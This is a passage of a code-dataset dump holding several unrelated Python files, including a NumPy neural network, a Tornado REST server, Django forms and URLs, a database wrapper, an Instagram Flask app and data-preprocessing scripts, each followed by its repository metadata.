print('Epoch {0} done: {1}'.format(j + 1, time.time() - start_time))\n \n return cost\n \n def predict(self, x):\n\n _, a = self.feedforward(x)\n return np.argmax(a[-1])\n \n def evaluate(self, test_data):\n results = [(self.predict(x), y) for (x, y) in test_data]\n return sum(int(_y == y) 
for (_y, y) in results)\n \n def feedforward(self, x):\n \n z = []\n a = [self.add_bias(x)]\n for l in range(1, self.L):\n z_l = np.dot(self.w[l-1], a[l-1])\n a_l = self.sigmoid(z_l)\n if l < self.L - 1:\n a_l = self.add_bias(a_l)\n \n z.append(z_l)\n a.append(a_l)\n \n return (z, a)\n \n def backprop(self, x, y):\n\n w_grad = [np.zeros(W.shape) for W in self.w]\n # feedforward\n z, a = self.feedforward(x)\n # backward\n dz = a[-1] - y\n for _l in range(1, self.L):\n l = -_l # layer index\n if l < -1:\n da = self.sigmoid_grad(z[l])\n # do not calc for w_0 (da_0 / dz = 0 because of a_0 = 1 for all z)\n dz = np.dot(self.w[l+1][:, 1:].transpose(), dz) * da\n # gradient \n w_grad[l] = np.dot(dz, a[l-1].transpose())\n \n return w_grad\n \n def add_bias(self, a):\n\n return np.insert(a, 0, 1, axis=0)\n \n def check_grad(self, data, grad, epsilon=1e-4, threshold=1e-6):\n\n for l in range(self.L - 1):\n n_row, n_col = self.w[l].shape\n for i in range(n_row):\n for j in range(n_col):\n w_l_ij = self.w[l][i][j]\n # left\n self.w[l][i][j] = w_l_ij - epsilon\n l_cost = self.cost(data)\n # right\n self.w[l][i][j] = w_l_ij + epsilon\n r_cost = self.cost(data)\n # numerical grad\n num_grad = (r_cost - l_cost) / (2 * epsilon)\n \n # diff\n diff = abs(grad[l][i][j] - num_grad)\n \n # reset w\n self.w[l][i][j] = w_l_ij\n \n if diff > threshold:\n print('Check Grad Error at (l: {0}, col: {1}, row: {2}), | num_grad: {3} vs backprop grad: {4} | : {5}'\n .format(l, i, j, num_grad, grad[l][i][j], diff))\n return False\n \n return True\n \n def cost(self, data):\n\n m = len(data)\n j = 0\n for x, y in data:\n _, a = self.feedforward(x)\n a_L = a[-1]\n j += np.sum(np.nan_to_num(y*np.log(a_L) + (1-y)*np.log(1-a_L)))\n return -j / m\n \n def sigmoid(self, z):\n\n return 1.0 / (1.0 + np.exp(-z))\n \n def sigmoid_grad(self, z):\n\n s = self.sigmoid(z)\n return s * (1 - s)\n\n","sub_path":"Neural_Network/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"340268129","text":"\"\"\"\n@summary: This is a simple REST application that satisfies the requirements \n specified by: https://gist.github.com/sivy/04b285fc341314a9476f\n@author: CJ Grady\n@version: 1.0\n\"\"\"\nimport glob\nimport json\nimport os\n\nimport tornado.ioloop\nimport tornado.web\n\nif os.environ.has_key('RESOURCES_DIR'):\n RESOURCES_DIR = os.environ['RESOURCES_DIR']\nelse:\n RESOURCES_DIR = os.path.join(os.getcwd(), 'resources')\n\nINDEX_FN = os.path.join(RESOURCES_DIR, 'index.txt')\n\n# .............................................................................\nclass ResourcesHandler(tornado.web.RequestHandler):\n \"\"\"\n @summary: This is the handler for the /resources/ service endpoint.\n \"\"\"\n # ............................\n def get(self, *args, **kwargs):\n \"\"\"\n @summary: Calling the resources service with an HTTP GET request will\n attempt to retrieve a resource if an id is provided or it\n will list existing resources if no id is provided\n @note: This method does not take any query parameters at this time, but\n that could be a future improvement\n \"\"\"\n vpath = list(args)\n try:\n id = int(vpath.pop(0))\n except:\n id = None\n\n if id is not None: # Get a resource\n resourceFn = getFilenameForId(id)\n if os.path.exists(resourceFn):\n with open(resourceFn) as inF:\n resource = json.load(inF)\n self.set_header('Content-Type', 'application/json')\n self.set_status(200)\n 
self.write(json.dumps(resource))\n else: # if the file doesn't exist, throw a 404 error\n self.set_status(404, reason=\"Resource %s was not found\" % id)\n else: # List resources\n resources = []\n for fn in glob.iglob(os.path.join(RESOURCES_DIR, \"*.json\")):\n with open(fn, 'r') as resourceF:\n resources.append(json.load(resourceF))\n self.set_header('Content-Type', 'application/json')\n self.set_status(200)\n self.write(json.dumps(resources))\n\n # ............................\n def post(self, *args, **kwargs):\n \"\"\"\n @summary: Calling the resources service with an HTTP POST request will \n create a new resource on the file system with the uploaded \n content\n @precondition: The uploaded content must be in application/json format\n \"\"\"\n resource = json.loads(self.request.body)\n id = getNextId()\n outFn = getFilenameForId(id)\n \n # Attempt to handle race conditions by getting a new id\n while os.path.exists(outFn):\n id = getNextId()\n outFn = getFilenameForId(id)\n \n resource['id'] = id\n \n with open(outFn, 'w') as outF:\n json.dump(resource, outF)\n \n self.set_header('Content-Type', 'application/json')\n self.set_status(201)\n self.write(json.dumps(resource))\n\n# .............................................................................\ndef getFilenameForId(id):\n \"\"\"\n @summary: Gets the file name associated with this id\n \"\"\"\n return os.path.join(RESOURCES_DIR, '%s.json' % id)\n\n# .............................................................................\ndef getNextId():\n \"\"\"\n @summary: Gets the next available id for a new resource\n @todo: Evaluate the thread safety of this method. \n \"\"\"\n curId = 0\n try:\n with open(INDEX_FN, 'r') as inF:\n curId = int(inF.read())\n except: \n pass # We already initialized\n \n nextId = curId + 1\n \n # Write out the file again\n with open(INDEX_FN, 'w') as outF:\n outF.write(unicode(nextId))\n\n return nextId\n\n# .............................................................................\napplication = tornado.web.Application([\n (r\"/resources/(.*)\", ResourcesHandler),\n])\n\n# .............................................................................\nif __name__ == \"__main__\":\n application.listen(8888)\n tornado.ioloop.IOLoop.current().start()\n","sub_path":"restApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"230559778","text":"from random import uniform #allows us to read CSV files\n\ndef read(CSVfileR):#taken from Intro II hw!Opens a file and returns the contents of the file in a list of strings\n data = open(CSVfileR,\"r\")\n CSV = data.readlines()\n data.close()\n return CSV\n\n#File = read(\"occupations.csv\")\ndef editData(list):#edits the list containing the contents of the csv file to make it easier to parse; returns totalPercentage as a float\n list.pop(0)#Removes column descriptions\n totalString = list[-1]\n totalString = totalString[0:len(totalString) -1]\n totalList = totalString.split(\",\")\n totalPercentage = float(totalList[1])\n list.pop()#Removes total occupation and percentage\n return totalPercentage#returns total percentage to be stored globally\n\n#totalPercentage = editData(File)#total percentage is stored globally\n#print (File)\n\ndef makeDict(list):#returns a dictionary using the occupation as the key and the percentage as the value\n dict = {}\n for string in list:\n string = string[0:len(string) -1]\n val = []\n if string[0] == 
'\"':#splits the string by double quotation marks if there are commas in the occupation description\n val = string.split('\"')\n val.pop(0)\n val[1] = val[1][1:]\n else:#splits the string by commas if there are no commas in the occupation description\n val = string.split(\",\")\n #print (l)\n dict[val[0]] = float(val[1])#Creates the dictionary using the occupation as the key and the percentage as the value\n return dict\n\n#Dict = makeDict(File)\ndef randOccupation(dict,totalPercentage):#returns a random occupation based on percentages in the data\n percent = uniform(0,totalPercentage)#picks a random float from 0 - 99.8\n for pval in dict:\n percent -= dict[pval]#subtracts each percentage from the randomly picked percentage from 0 - 99.\n if percent < 0:\n return pval\n#print (randOccupation(Dict))\n \ndef main():\n File = read(\"data/occupations.csv\")\n head = File[0]\n head = head[0:len(head) - 1] \n listH = head.split(\",\") #Splits up occ names for table\n h1 = listH[0] #Makes First header\n h2 = listH[1] #Makes Second header\n Data = File\n Data = Data[1: len(Data)]\n Data = makeDict(Data)\n totalPercentage = editData(File)#total percentage is stored globally\n Dict = makeDict(File) #Makes File into Dict again for randOccupation fnx\n return (randOccupation(Dict,totalPercentage), Data, h1, h2) #returns both rand occ, data for table, and headers\n\n","sub_path":"10_occupy_flask_st/util/parse_occupations.py","file_name":"parse_occupations.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"649658605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"MOD005622 TRI2 B01CAM\"\"\"\n__author__ = \"Tim Clarke\"\n__copyright__ = \"Copyright 2020, Tim Clarke/Zach Beed\"\n__license__ = \"Private\"\n__version__ = \"0.0.6\"\n\nimport sys\nimport psycopg2\nfrom psycopg2 import extras\n\n\"\"\"\ndb.py\n\n created by: Tim Clarke\n\n date: 29feb2020\n purpose: singleton database connection and query execution\n arguments: instantion: host and database strings\n returns: (see methods)\n\"\"\"\n\n\nclass Db(object):\n \"\"\"singleton database interaction interface\"\"\"\n # private variables\n _modulename = 'Db'\n _instance = None\n _conn = '' # psycopg2 database connection\n _cursor = '' # psycopg2 database cursor\n\n def __new__(self, *args, **kwargs):\n \"\"\"singleton override\"\"\"\n if not self._instance:\n self._instance = object.__new__(self)\n return self._instance\n\n def __init__(self, host, database):\n _functionname = '__init__'\n try:\n self._conn = psycopg2.connect(host=host, database=database)\n self._cursor = self._conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n raise RuntimeError(\"Error in {0}.{1}(): {2} at line {3}\".\n format(self._modulename, _functionname,\n str(exc_value),\n str(exc_traceback.tb_lineno)))\n\n def query(self, sql, *args):\n \"\"\"execute select statement with variable number of arguments\n returns: list of column names, list of lists of row data\n \"\"\"\n _functionname = 'query'\n\n try:\n if len(sql) < 1:\n raise RuntimeError('Empty query statement given')\n self._cursor.execute(sql, args)\n if self._cursor.rowcount < 1:\n return None, None\n else:\n # get column names from query\n colnames = [desc[0] for desc in self._cursor.description]\n return colnames, self._cursor.fetchall()\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n raise 
RuntimeError(\"Error in {0}.{1}(): {2} at line {3}\".\n format(self._modulename, _functionname,\n str(exc_value),\n str(exc_traceback.tb_lineno)))\n\n def insert(self, sql, *args):\n \"\"\"execute insert statement with variable number of arguments\n returns: nothing\n \"\"\"\n _functionname = 'insert'\n\n try:\n if len(sql) < 1:\n raise RuntimeError('Empty insert statement given')\n self._cursor.execute(sql, args)\n self._conn.commit()\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n raise RuntimeError(\"Error in {0}.{1}(): {2} at line {3}\".\n format(self._modulename, _functionname,\n str(exc_value),\n str(exc_traceback.tb_lineno)))","sub_path":"src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529722940","text":"from django import forms\nfrom tempcontrol.models import *\nfrom django.contrib.admin import widgets\nfrom django.forms import BaseModelFormSet\n\n# Formulario de creacion de Control Proceso nuevo\nclass ControlPocesosCrearForm(forms.ModelForm):\n\t#fechaInicio = forms.DateField(widget=forms.SelectDateWidget())\n\t#fermentado1Fin = forms.DateField(widget=forms.SelectDateWidget())\n\t#fermentado2Fin = forms.DateField(widget=forms.SelectDateWidget())\n\t#maduradoFin = forms.DateField(widget=forms.SelectDateWidget())\n\t#clarificadoFin = forms.DateField(widget=forms.SelectDateWidget())\n\t\n\tclass Meta:\n\t\tmodel = ControlProcesos\n\t\tfields = ('coccionNum','fermentador','temperaturaPerfil')\n\t\t#fields = ('fechaInicio','fermentador','sensor','temperaturaPerfil','activo','fermentado1Fin','fermentado2Fin','maduradoFin','clarificadoFin')\n\n\nclass ControlPocesosForm(forms.ModelForm):\n class Meta:\n model = ControlProcesos\n fields = ('coccionNum','fechaInicio','fermentador','temperaturaPerfil','activo','fermentado1Fin','fermentado2Fin','maduradoFin','clarificadoFin')\n def __init__(self, *args, **kwargs):\n from django.forms.widgets import HiddenInput\n hide_condition = kwargs.pop('hide_condition',None)\n super(ControlPocesosForm, self).__init__(*args, **kwargs)\n if hide_condition:\n self.fields['fechaInicio'].widget = HiddenInput()\n self.fields['fermentado1Fin'].widget = HiddenInput()\n self.fields['fermentado2Fin'].widget = HiddenInput()\n self.fields['maduradoFin'].widget = HiddenInput()\n self.fields['clarificadoFin'].widget = HiddenInput()\n #self.fields['sensor'].widget = HiddenInput()\n # or alternately: del self.fields['fieldname'] to remove it from the form altogether.\n class BaseAuthorFormSet(BaseModelFormSet):\n\t def __init__(self, *args, **kwargs):\n\t \tsuper(BaseAuthorFormSet, self).__init__(*args, **kwargs)\n\t \tself.queryset = Fermentadores.objects.filter(activo=True)\n\n\n\n\nclass SensoresCrearFormm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Sensores\n\t\tfields = ('nombre','mac','activo')\n\nclass PerfilesTempCrearForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = TemperaturasPerfiles\n\t\tfields = ('nombre','diasFermentado1','diasFermentado2',\n\t\t\t'diasMadurado','diasclarificado','temperaturas','descripcion')\n\n\nclass PerfilTempForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = TemperaturasPerfiles\n\t\tfields = ('nombre','diasclarificado')\n\nclass FermentadorForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Fermentadores\n\t\tfields = 
('id','nombre',)\n\n\n\t","sub_path":"tempcontrol/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"449099838","text":"#!/usr/bin/env python3\n\nimport os\nimport tarfile\nimport filecmp\n\n\n\n# use make file to compile to library\n\n# Create new file and put files in them\nos.system(\"mkdir /tmp/Test\")\nos.system(\"cp ex2.tar /tmp/Test\")\nos.system(\"cp test.cpp /tmp/Test\")\nos.system(\"cp results.txt /tmp/Test\")\n\n\ncurFolder = os.path.dirname(os.path.realpath(__file__))\nos.chdir(\"/tmp/Test\")\nfiles = tarfile.open(\"ex2.tar\")\nfiles.extractall(path=\".\", members=None)\nos.system(\"make\")\nos.system(\"g++ -c test.cpp\")\n\n# incase library was built in c++\nos.system(\"g++ test.o -L. -luthreads -o runtest\")\n\n#library is now linked now just run tests..\nos.system(\"runtest > output.txt\")\nos.system(\"diff results.txt output.txt > diff.txt\")\n# Check the two outputs\nif os.system(\"diff results.txt output.txt > diff.txt\"):\n\tprint(\"\\n--------Failed Sanity Check-------- \\nCheck the output.txt and diff.txt files\")\n\tos.system(\"cp diff.txt \" + curFolder)\n\tos.system(\"cp output.txt \" + curFolder)\nelse:\n\tprint(\"\\n--------Passed Sanity Check--------\")\n\nfiles.close()\nos.chdir(curFolder)\nos.system(\"rm -rf /tmp/Test\")\nprint(\"End Script\")\n\n\n\n\n\n","sub_path":"ex2sanity/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"502390913","text":"# import getpass as gt\n\n# Hour = \"\"\n# RPH = 2.75\n# grossPay = \"\"\n\n# Val= isinstance(Hour,str)\n# Username= gt.getuser()\n# while Val:\n# try:\n# Hour = float(input(\"Enter the total hours you worked in a day:\"))\n# Val = isinstance(Hour,str)\n# except Exception as e:\n# print(\"Incorrect entry, please enter the hours in number.\")\n# else:\n# grossPay = Hour * RPH\n# print(\"Dear {0}, Your earning for a day is ${Pay} \".format(Username,Pay=grossPay))\n# print(f\"Dear {Username}, Your earning for a day is ${grossPay:.2f} \")\n\n\nimport getpass as gt\n\nHour = \"\"\nRPH = 10.50\nGrosspay = \"\"\nOvertime = 0\nOverTimePay = 0\nBasePay = 0\nVal=\"\"\n\nUsername = gt.getuser()\nVal = isinstance(Hour,str)\nwhile Val:\n try:\n Hour = float(input(\"Enter the total hours you worked in a day:\"))\n Val = isinstance(Hour,str)\n if Hour <= 40:\n Grosspay = Hour * RPH\n else:\n Overtime = Hour - 40\n BasePay = (Hour - Overtime) * RPH\n Grosspay = BasePay + (Overtime * (RPH * 1.5))\n except Exception as e:\n print(\"Incorrect entry, please enter the hours in number.\")\nelse: \n print(\"Dear {0}, Your earning for a day is ${Pay} \".format(Username,Pay=Grosspay))","sub_path":"Programs/Gross Pay.py","file_name":"Gross Pay.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"305601103","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass BusinessParamsDTO(object):\n\n def __init__(self):\n self._actual_order_time = None\n self._campus_card = None\n self._card_type = None\n self._enterprise_pay_amount = None\n self._enterprise_pay_info = None\n self._good_taxes = None\n\n @property\n def actual_order_time(self):\n return self._actual_order_time\n\n @actual_order_time.setter\n def 
actual_order_time(self, value):\n self._actual_order_time = value\n @property\n def campus_card(self):\n return self._campus_card\n\n @campus_card.setter\n def campus_card(self, value):\n self._campus_card = value\n @property\n def card_type(self):\n return self._card_type\n\n @card_type.setter\n def card_type(self, value):\n self._card_type = value\n @property\n def enterprise_pay_amount(self):\n return self._enterprise_pay_amount\n\n @enterprise_pay_amount.setter\n def enterprise_pay_amount(self, value):\n self._enterprise_pay_amount = value\n @property\n def enterprise_pay_info(self):\n return self._enterprise_pay_info\n\n @enterprise_pay_info.setter\n def enterprise_pay_info(self, value):\n self._enterprise_pay_info = value\n @property\n def good_taxes(self):\n return self._good_taxes\n\n @good_taxes.setter\n def good_taxes(self, value):\n self._good_taxes = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.actual_order_time:\n if hasattr(self.actual_order_time, 'to_alipay_dict'):\n params['actual_order_time'] = self.actual_order_time.to_alipay_dict()\n else:\n params['actual_order_time'] = self.actual_order_time\n if self.campus_card:\n if hasattr(self.campus_card, 'to_alipay_dict'):\n params['campus_card'] = self.campus_card.to_alipay_dict()\n else:\n params['campus_card'] = self.campus_card\n if self.card_type:\n if hasattr(self.card_type, 'to_alipay_dict'):\n params['card_type'] = self.card_type.to_alipay_dict()\n else:\n params['card_type'] = self.card_type\n if self.enterprise_pay_amount:\n if hasattr(self.enterprise_pay_amount, 'to_alipay_dict'):\n params['enterprise_pay_amount'] = self.enterprise_pay_amount.to_alipay_dict()\n else:\n params['enterprise_pay_amount'] = self.enterprise_pay_amount\n if self.enterprise_pay_info:\n if hasattr(self.enterprise_pay_info, 'to_alipay_dict'):\n params['enterprise_pay_info'] = self.enterprise_pay_info.to_alipay_dict()\n else:\n params['enterprise_pay_info'] = self.enterprise_pay_info\n if self.good_taxes:\n if hasattr(self.good_taxes, 'to_alipay_dict'):\n params['good_taxes'] = self.good_taxes.to_alipay_dict()\n else:\n params['good_taxes'] = self.good_taxes\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = BusinessParamsDTO()\n if 'actual_order_time' in d:\n o.actual_order_time = d['actual_order_time']\n if 'campus_card' in d:\n o.campus_card = d['campus_card']\n if 'card_type' in d:\n o.card_type = d['card_type']\n if 'enterprise_pay_amount' in d:\n o.enterprise_pay_amount = d['enterprise_pay_amount']\n if 'enterprise_pay_info' in d:\n o.enterprise_pay_info = d['enterprise_pay_info']\n if 'good_taxes' in d:\n o.good_taxes = d['good_taxes']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/BusinessParamsDTO.py","file_name":"BusinessParamsDTO.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332900407","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 5 12:19:27 2017\n\n@author: nick\n\"\"\"\n\n# import numpy as np\n# import matplotlib.pyplot as plt\n# import os\n# import cv2\n#\n# folderO = \"/Users/yannick/Documents/Playground/Python/data/x_vs_o/circles\"\n# folderX = \"/Users/yannick/Documents/Playground/Python/data/x_vs_o/crosses\"\n#\n# N = len(os.listdir(folderO))\n# dataO = np.empty((N, 32, 32), dtype=np.uint8)\n# N = len(os.listdir(folderX))\n# dataX = np.empty((N, 32, 32), dtype=np.uint8)\n#\n# for i, fpath in 
enumerate(os.listdir(folderO)):\n# print(i, \":\", fpath)\n# dataO[i] = cv2.resize(cv2.imread(os.path.join(folderO, fpath), cv2.IMREAD_GRAYSCALE), (32,32), interpolation=cv2.INTER_AREA)\n#\n# for i, fpath in enumerate(os.listdir(folderX)):\n# print(i, \":\", fpath)\n# dataX[i] = cv2.resize(cv2.imread(os.path.join(folderX, fpath), cv2.IMREAD_GRAYSCALE), (32,32), interpolation=cv2.INTER_AREA)\n#\n# data_x = np.append(dataO, dataX, axis=0)\n# data_y = np.append(np.zeros(len(dataO)), np.ones(len(dataX)))\n#\n# f, axes = plt.subplots(2, 2, sharey=True)\n# axes[0][0].set_axis_off()\n# axes[0][0].imshow(dataO[100])\n# axes[1][0].set_axis_off()\n# axes[1][0].imshow(dataX[100])\n# axes[0][1].set_axis_off()\n# if data_y[100] == 0:\n# axes[0][1].set_title(\"Circle\")\n# else:\n# axes[0][1].set_title(\"Cross\")\n# axes[0][1].imshow(data_x[100])\n# axes[1][1].set_axis_off()\n# if data_y[1100] == 0:\n# axes[1][1].set_title(\"Circle\")\n# else:\n# axes[1][1].set_title(\"Cross\")\n# axes[1][1].imshow(data_x[1100])\n\n\n## VERSION 2\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\n\nsize_pix = 64\nfolderO = \"/home/nick/Documents/data/elephants_crop\"\n\nN = len(os.listdir(folderO))\ndataO = np.empty((N, size_pix, size_pix, 3), dtype=np.uint8)\n\nfor i, fpath in enumerate(os.listdir(folderO)):\n print(i, \":\", fpath)\n dataO[i] = cv2.resize(cv2.imread(os.path.join(folderO, fpath), cv2.IMREAD_COLOR), (size_pix,size_pix), interpolation=cv2.INTER_AREA)\n #dataO[i] = cv2.resize(cv2.imread(os.path.join(folderO, fpath), cv2.IMREAD_GRAYSCALE), (size_pix,size_pix), interpolation=cv2.INTER_AREA)\n\n\ndata_x_train = dataO[:1200, ...]\ndata_x_test = dataO[1200:, ...]\n\nplt.figure()\nplt.axis(\"off\")\nplt.imshow(dataO[245])\n\n\n## VERSION 3\n\nimport os, sys\nimport glob\n#import cPickle as pkl\nimport numpy as np\nimport PIL.Image as Image\nfrom skimage.transform import resize\n\n#img = Image.open(\"/home/nick/Documents/data/elephants/n02504013_1673.JPEG\")\n#img.show()\n\ndef resize_images():\n # From IFT6266 2017 Project \n \n ### PATH need to be fixed\n data_path=\"/home/nick/Documents/data/elephants/\"\n save_dir = \"/home/nick/Documents/data/elephants_crop/\"\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n preserve_ratio = True\n image_size = (64, 64)\n\n imgs = glob.glob(data_path+\"/*.JPEG\")\n\n\n for i, img_path in enumerate(imgs):\n img = Image.open(img_path)\n print(i, len(imgs), img_path)\n\n if img.size[0] != image_size[0] or img.size[1] != image_size[1] :\n if not preserve_ratio:\n img = img.resize((image_size), Image.ANTIALIAS)\n else:\n ### Resize based on the smallest dimension\n scale = image_size[0] / float(np.min(img.size))\n new_size = (int(np.floor(scale * img.size[0]))+1, int(np.floor(scale * img.size[1])+1))\n img = img.resize((new_size), Image.ANTIALIAS)\n\n img.save(save_dir + os.path.basename(img_path))\n \n \nimg = Image.open(\"/home/nick/Documents/data/elephants/n02504013_1673.JPEG\")\nimg.show()","sub_path":"ToyProjects/elephants_loadingdata.py","file_name":"elephants_loadingdata.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"520459023","text":"import constants\nfrom flask import Flask, render_template, request\nfrom instagram import client, subscriptions\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n unauthenticated_api = client.InstagramAPI(**constants.TEST_CONFIG)\n url = unauthenticated_api.get_authorize_url()\n\n 
return render_template('index.html', url=url)\n\n@app.route('/photos')\ndef photos():\n unauthenticated_api = client.InstagramAPI(**constants.TEST_CONFIG)\n code = request.args['code']\n try:\n access_token, user_info = unauthenticated_api.exchange_code_for_access_token(code)\n except TypeError:\n return True\n\n api = client.InstagramAPI(access_token=access_token)\n user = api.user().full_name\n media, _ = api.user_recent_media(count=-1)\n pictures = []\n most_liked_sorted = []\n for pic in media:\n new_img = {\n 'title': pic.location.name,\n 'url': pic.images['low_resolution'].url,\n 'lat': pic.location.point.latitude,\n 'lng': pic.location.point.longitude,\n 'likes': pic.like_count\n }\n pictures.append(new_img)\n\n most_liked = sorted(pictures, key=lambda k: k['likes'], reverse=True)\n return render_template('photos.html', pictures=pictures, user=user, most_liked=most_liked[0:11])\n\n@app.errorhandler(500)\ndef internal_error(error):\n\n return error\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"brendancom.py","file_name":"brendancom.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479592418","text":"import pickle\n\ngraph = pickle.load(open('val_graph2.p', 'rb'))\n\nnew_graph = {}\n\nGENDER_NEUTRAL_NAMES = ['Casey', 'Riley', 'Jessie', 'Jackie', 'Avery', 'Jaime', 'Peyton', 'Kerry', 'Jody', 'Kendall',\n 'Peyton', 'Skyler', 'Frankie', 'Pat', 'Quinn',\n ]\n\nfor img in graph.keys():\n relas = graph[img]\n sentence = []\n\n for rela in relas:\n rela = rela.strip().split()\n for word in rela:\n if word in GENDER_NEUTRAL_NAMES:\n obj_index = GENDER_NEUTRAL_NAMES.index(word)\n sentence.append(f'[{obj_index}]')\n else:\n sentence.append(word)\n sentence.append('&')\n new_graph[img] = sentence[:-1]\n\noutfile = open('val_relation.p','wb')\npickle.dump(new_graph, outfile)\noutfile.close()","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129100949","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom . 
import views\n\napp_name = 'sns'\nurlpatterns = [\n path('', views.timeline, name='timeline'),\n path('/', views.userpage, name='userpage'),\n path('//', views.detail, name='detail'),\n path('//delete_confirm/', views.delete_confirm, name='delete_confirm'),\n path('//delete/', views.delete, name='delete'),\n path('//reply/', views.reply, name='reply'),\n path('//good/', views.good, name='good'),\n path('post/', views.post, name='post'),\n path('edit/', views.edit, name='edit'),\n path('create_account/', views.create_account, name='create_account'),\n path('account_login/', views.account_login, name='login'),\n path('logout/', views.Logout.as_view(), name='logout'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"sns/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"412176995","text":"from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport math\nimport util \nimport classifier2 as classifier\nimport classifier_entropy\nimport my_model as model\nimport numpy as np\nfrom model import MLP_G\nfrom eval import *\nimport selector\n\nparser = argparse.ArgumentParser(\"GZSL Action\")\nparser.add_argument('--dataset', default='hmdb51', help='Dataset name')\nparser.add_argument('--dataroot', default='data_action/', help='path to dataset')\nparser.add_argument('--matdataset', default=True, help='Data in matlab format')\nparser.add_argument('--action_embedding', default='i3d')\nparser.add_argument('--class_embedding', default='att')\nparser.add_argument('--split', type=int, default=1)\nparser.add_argument('--syn_num', type=int, default=100, help='number features to generate per class')\nparser.add_argument('--gzsl', action='store_true', default=False, help='enable generalized zero-shot learning')\nparser.add_argument('--gzsl_od', action='store_true', default=False, help='enable out-of-distribution based generalized zero-shot learning')\nparser.add_argument('--preprocessing', action='store_true', default=False, help='enbale MinMaxScaler on visual features')\nparser.add_argument('--standardization', action='store_true', default=False)\nparser.add_argument('--validation', action='store_true', default=False, help='enable cross validation mode')\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=2)\nparser.add_argument('--batch_size', type=int, default=64, help='input batch size')\nparser.add_argument('--resSize', type=int, default=4096, help='size of visual features')\nparser.add_argument('--attSize', type=int, default=300, help='size of semantic features')\nparser.add_argument('--nz', type=int, default=256, help='size of the latent z vector')\nparser.add_argument('--ngh', type=int, default=4096, help='size of the hidden units in generator')\nparser.add_argument('--ndh', type=int, default=4096, help='size of the hidden units in discriminator')\nparser.add_argument('--nepoch', type=int, default=50, help='number of epochs to train for')\nparser.add_argument('--critic_iter', type=int, default=5, help='critic iteration, following WGAN-GP')\nparser.add_argument('--lambda1', type=float, default=10, help='gradient penalty regularizer, following WGAN-GP')\nparser.add_argument('--cosem_weight', type=float, 
default=0.1, help='weight of the cos embed loss')\nparser.add_argument('--recons_weight', type=float, default=0.01, help='recons_weight for decoder')\nparser.add_argument('--lr', type=float, default=0.0001, help='learning rate to train GANs')\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', default=False, help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\nparser.add_argument('--netG', default='', help=\"path to netG (to continue training)\")\nparser.add_argument('--netD', default='', help=\"path to netD (to continue training)\")\nparser.add_argument('--netDec', default='', help=\"path to netDec (to continue training)\")\nparser.add_argument('--netG_name', default='')\nparser.add_argument('--netD_name', default='')\nparser.add_argument('--start_epoch', type=int, default=0)\nparser.add_argument('--manualSeed', type=int, help='manual seed')\nparser.add_argument('--nclass_all', type=int, default=200, help='number of all classes')\n\n# note: argparse's type=bool treats any non-empty string (even 'False') as True,\n# so these boolean switches are declared as store_true flags instead\nparser.add_argument('--use_gan', action='store_true', default=False, help='use gan to generate')\nparser.add_argument('--use_od', action='store_true', default=False, help='use the out-of-distribution 